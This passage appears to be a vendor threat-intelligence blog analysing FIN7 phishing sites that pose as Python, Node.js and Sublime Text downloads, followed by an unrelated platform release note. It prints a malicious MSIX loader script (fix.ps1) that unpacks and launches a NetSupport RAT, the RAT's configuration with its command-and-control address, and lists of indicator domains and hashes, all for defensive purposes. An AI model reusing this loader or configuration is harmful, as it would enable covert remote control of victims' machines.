Amongst the larger pool of domains was hotnotepad[.]com, which was hosting a phishing site offering a suspicious Python download.

Whilst a legitimate version of Python was offered to our Analysts in live testing, as with most other FIN7 infrastructure, users in other regions, with different browser settings, may have a different experience when visiting the domain and triggering the download.

FIN7 fake Python page
hotnotepad[.]com

We then used hotnotepad[.]com to construct a query using a combination of HTML and DNS data, and were able to uncover yet more infrastructure hosting spoofed developer-focused content, with links that expose malicious payloads based on user parameters.

FIN7 fake Sublime Text page
“Download Sublime Text” @ netepadtee[.]com
FIN7 fake JavaScript page
“Download Node.js” @ multyimap[.]com

FIN7 malware payload analysis

Let’s take a closer look at a piece of FIN7 malware. For our analysis, we’re using LexisNexis.msix

  • Type: Zip archive file
  • MD5: ff25441b7631d64afefdb818cfcceec7
  • Compression: Deflate

To masquerade as a trusted executable, the malware has appropriated certificate data from what appears to be a Chinese manufacturing company, Cangzhou Chenyue Electronic Technology:

<Identity Name="LexisNexis" Publisher="CN="Cangzhou Chenyue Electronic Technology Co., Ltd.", O="Cangzhou Chenyue Electronic Technology Co., Ltd.", L=Cangzhou, S=Hebei, C=CN, SERIALNUMBER=91130922MA0G8AN920, OID.1.3.6.1.4.1.311.60.2.1.1=Cangzhou, OID.1.3.6.1.4.1.311.60.2.1.2=Hebei, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization" Version="4.12.98.0" />

The malware has the following embedded configuration:

{
  "applications": [
    {
      "id": "NOTEPAD",
      "executable": "VFS\\ProgramFilesX64\\PsfRunDll64.exe",
      "scriptExecutionMode": "-ExecutionPolicy RemoteSigned",
      "startScript": {
        "waitForScriptToFinish": false,
        "runOnce": false,
        "showWindow": false,
        "scriptPath": "fix.ps1"
      }
    }
  ]
}

And here’s the executing script, fix.ps1:

$url = "https://www.lexisnexis.com/"
Start-Process $url

$domain = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Domain

if ($domain -eq "WORKGROUP") {
} else {
    cmd /c "VFS\ProgramFilesX64\7z2404-extra\7za.exe e VFS\ProgramFilesX64\client2.7z -oC:\Users\Public\Client -p1234567890"
    cmd /c "VFS\ProgramFilesX64\7z2404-extra\7za.exe e C:\Users\Public\Client\client1.7z -oC:\Users\Public\Client -p1234567890"
    $path = "C:\Users\Public\Client\client32.exe"
    Start-Process $path
}

Delivery chain

Analysing the attack chain, it’s clear that the malware is designed to target domain-joined machines, and all the corporate data they have to offer.

The malware seeks to obtain eleveated privileges, including lateral movement and access to Active Directory.

  1. The attack starts when the script opens the LexisNexis website, either as a distraction or to mimic legitimate user activity.
  2. The malware then checks if the machine is part of a domain, or in a workgroup.
  3. If the machine isn’t in a workgroup, the script extracts two encrypted 7-Zip archives (password: 1234567890) and runs an executable from the extracted data

Extracted package

  • Type: Remote Access Trojan
  • Name: NetSupport RAT
  • C2 infrastructure: 166.88.159[.]37
  • Licensee: MGJFFRT466

Embedded configuration:

; NetSupport License File.
; Generated on 00:48 - 19/03/2014

[[Enforce]]

[_License]
control_only=0
expiry=
inactive=0
licensee=MGJFFRT466
maxslaves=100000
os2=1
product=10
serial_no=NSM301071
shrink_wrap=0
transport=0

[Client]
_present=1
AlwaysOnTop=0
AutoICFConfig=1
DisableChat=1
DisableChatMenu=1
DisableDisconnect=1
DisableMessage=1
DisableReplayMenu=1
DisableRequestHelp=1
Protocols=3
Shared=1
silent=1
SKMode=1
SOS_Alt=0
SOS_LShift=0
SOS_RShift=0
SysTray=0
UnloadMirrorOnDisconnect=0
Usernames=*
ValidAddresses.TCP=*

[_Info]
Filename=C:\Users\Public\Pictures\client32u.ini

[_License]
quiet=1

[Audio]
DisableAudioFilter=1

[General]
BeepUsingSpeaker=0

[HTTP]
CMPI=60
GatewayAddress=166[.]88.159.37:443
GSK=GC:D?GCDFH9J<LBBGH;E>ODG<C@KCI
SecondaryGateway=
SecondaryPort=

[TCPIP]
MulticastListenAddress=

Similar FIN7 malware

Our Analysts used internal tooling to pivot on key DLL elements of the malware, and discover links to other MSIX files targeting a range of organizations:

FILE NAMECOMPANY NAMEFILE HASH
pgadmin4.msixpgAdmin032d68449a93200aa257943b7e22e619e5ab383f61c7466f7872eeba5ea5b838
airtable-x64.msixAirtable03c84ae3bdd28341bdb9ef24918c3cad6c9ed27c768d351f23e6d37bf048f7a4
Workable_4.12.7.msixWorkable184a400fe334027ff287ad0cf83c165fdf4605507c83ec054fb2b544f877163c
CNN.msixCNN1d17937f2141570de62b437ff6bf09b1b58cfdb13ff02ed6592e077e2d368252
Asana.msixAsana1e54b2e6558e2c92df73da65cd90b462dcafa1e6dcc311336b1543c68d3e82bc
GoogleMeet.msixGoogle Meet3869340562136d1d8f11c304f207120f9b497e0a430ca1a04c0964eb5b70f277
SAPConcur.msixSAP Concur41c671332b58f92187e32771ed1ba86c1ed256e36f036f74c91cf1aa7db07bc2
GrammarlyInstaller.msixGrammarly43f4d0ae8f84c36d635423719562cdb0f5d9647b79a758a33fdf4aa7540f5622
Westlaw_105.0.55.0_x64__3hat911yg85re.msixWestlaw448559c22bf09e6526b67defddcace275d7a0c580a38b0961165bc1efdb3367e
npp.Installer.x64.msixNotepad++50b102938d29cc7f61c67da6981545c69f70c7178d009ec1999ee0ddfe81ebba
QuickBooksInstaller.msixQuickBooks63750019f4a8498edc008a343be90aac8fbb3307ba7eb519fc5df16258dff19c
ZoomInstaller.msixZoom8a24b6f83761561d8b71429f586248f264139aee2d8349f375ccbba702e4ecb2
AIMP.msixAIMP9953bbe13394bc6cd88fd0d13ceff771553e3a63ff84dc20960b67b4b9c9e48e
BloombergTerminal-x64.msixBloomberg Terminale8c6831d6e238df5a1f20fc00867b333474a659734ac46a9902fbbadaaf0b51e
PuTTY-64bit-0.79-installer (3).msixPuTTYfbec6e79b663d4c5e660a7aff23e392a4f1311382923669548945e8346edbffb
anyconnect-win.msixCisco AnyConnectfdfd96f00e9e713cf86e2d32fb0c653b66fccc0e4969eac9f26d5cdcca98ff7d
ProtectedPDFViewer.msixProtectedPDFViewerd73af3bd70f0f68846920d61fab8836cf8906a2876489801f6e130f4d92aa50d

Mitigating FIN7 activity

We’ve grouped together FIN7 domains and IPs into two dedicated IOFA Feeds.

Silent Push Enterprise users can ingest this data into their security stack, allowing them to block FIN7 infrastructure at its source.

Data is available for export in CSV, JSON or STIX format, or as an automated code snippet using the Silent Push API.

We’ve also published a TLP Amber report, for Enterprise users, that contains links to the specific queries, lookups and scans that we’ve used to identify and traverse FIN7 infrastructure – including proprietary parameters that we’ve omitted from this blog for operational security reasons.

Register for Community Edition

Silent Push Community Edition is a free threat hunting and cyber defense platform featuring a range of advanced offensive and defensive lookups, web content queries, and enriched data types, that we used to track FIN7.

Click here to sign-up for a free account.

IOFAs

  • 103.113.70[.]142
  • 103.35.191[.]28
  • 89.105.198[.]190
  • 2024sharepoint[.]lat
  • accountverify.business-helpcase718372649[.]click/ 
  • affinitycloudenergy[.]com
  • americangiftsexpress[.]com
  • androiddeveloperconsole[.]com
  • app.rmscloud[.]pro
  • app-trello[.]com
  • ariba[.]one
  • autodesk[.]pm
  • bloomberg-t[.]com
  • book.louvre-ticketing[.]com
  • concur[.]cfd
  • concur[.]pm
  • concur[.]re
  • concuur[.]com
  • costsco1[.]com
  • cybercloudsec[.]com
  • cybercloudsecure[.]com
  • dr1ve[.]xyz
  • driv3[.]net
  • driv7[.]com
  • escueladeletrados[.]com
  • ggooleauth[.]xyz
  • go-ia[.]info
  • go-ia[.]site
  • harvardyardcollection[.]com
  • hcm-paycor[.]org
  • https-twitter[.]com
  • hotnotepad[.]com
  • identity-wpengine[.]com/session_id/login/
  • kun-quang-api.lordofscan[.]pro/LoginProcess/api/login_submit
  • lexisnexis[.]day
  • ln[.]run/supportcenterbusiness
  • louvre-event[.]com
  • louvrebil[.]click
  • miidjourney[.]net
  • multyimap[.]com
  • netepadtee[.]com
  • netfiix-abofrance[.]com
  • onepassreglons[.]com
  • paris-journey[.]com
  • paybx[.]world
  • quicken-install[.]com
  • redfinneat[.]com
  • restproxy[.]com
  • rupaynews[.]com
  • techevolveproservice[.]com
  • themetasupporrtbusiness.nexuslink[.]click
  • themetasupporrtbusiness.nexuslink[.]click/ 
  • thomsonreuter[.]info
  • tredildlngviw[.]shop
  • tredildlngviw[.]xyz
  • treidingviw-web[.]lol
  • treidingviw-web[.]shop
  • treidingviw-web[.]xyz
  • trezor-web[.]io
  • trydropbox[.]com
  • wal-streetjournal[.]com
  • webex-install[.]com
  • westlaw[.]top
  • womansvitamin[.]com
  • wpenglneweb[.]com
  • www.tivi2[.]com
  • www.wpenglneweb[.]com
  • xn--manulfe-kza[.]com
  • xn--bitwardn-h1a[.]com
  • zoomms-info[.]com
Screenshots of Silent Push platform v4.3 next to list if Release 4.3 features, including brand impersonation update, web scanner updates, live scan updates, and UI updates

Release 4.3: Brand Impersonation, Web Scanner, Live Scan and IOFA Feed updates

Release 4.3 has arrived!

We’ve significantly expanded our Brand Impersonation capabilities, with the addition of Email Impersonation, HTML Title Impersonation and Favicon Impersonation queries to support early detection of impersonators across a variety of digital assets.

We’ve also enhanced our Web Scanner and Live Scan tools. You are now able to pivot directly from the Live Scan results to perform a new Web Scanner query, allowing you to view historical web data in conjunction with live infrastructure to help analyse attack patterns in a matter of a few clicks.

Brand Impersonation

This release sees a significant expansion of our Brand Impersonation capabilities. Now with a dedicated menu item ‘Brand Impersonation’, we’ve introduced three new brand impersonation tools alongside our existing Domain Impersonation query to support early detection across a variety of digital assets.

  • Email Impersonation: find newly seen domains that are used to target organisations leveraging MX records (i.e., via email)
  • HTML Title Impersonation: search for other sites that are impersonating your domain’s HTML title
  • Favicon Impersonation: search for sites that are impersonating your brand’s favicon

Web Scanner

We’ve made several enhancements to our Web Scanner tool to improve its intuitiveness. 

  • Enhanced query operators: we’ve added four new operators to the Operator dropdown in the ‘Simple Search’ tab 
  • SPQL field descriptions: view a description of each SPQL field in the ‘Field Name’ dropdown, along with a tooltip
  • New slide-in section: view query examples, saved searches and recent searches in the ‘My Searches’ pop-up
  • Add to feed or collection: you are now able to add Web Scanner results to a new or existing feed or collection

Live Scan

We’ve updated our Live Scan tool with new sharing capabilities, pivoting functions and scanning features to support your search.

  • Advanced scan options: emulate a scan using 4 top-level parameters – ‘Region’, ‘User Agent’, ‘OS’, and ‘Browser’
  • Dark Web Scan tab: perform a scan using a .onion URL
  • Share scan results on social media
  • Pivot from scan results: left-click any blue text in the results screen to add the data element to a Web Scanner query
  • Add to feed or collection: add Live Scan results to a new or existing feed or collection

‘Quick Search’ menu

A new left-hand Quick Search menu has been added, allowing you to search through menu options and quickly access your favorite tools.

Additional resources

Check out this short video by our Director of Sales Engineering, Maulik Limbachiya, who summarizes the new features available to you in Release 4.3:

IOFA Feed tag support

Each feed on the IOFA Feeds menu now shows the tags associated with that feeds. You are now able to filter the screen using a Filter By Tags drop-down menu.

Additional resources

Check out this summary of Release 4.3 by Silent Push Director of Sales Engineering, Maulik Limbachiya.

Visit the Silent Push Knowledge Base to view detailed guides and information regarding the platform and our latest releases.

Get in touch

Have any questions about the new release, or would like to learn more about our Community and Enterprise Editions? Get in touch today and we’ll get back to you shortly.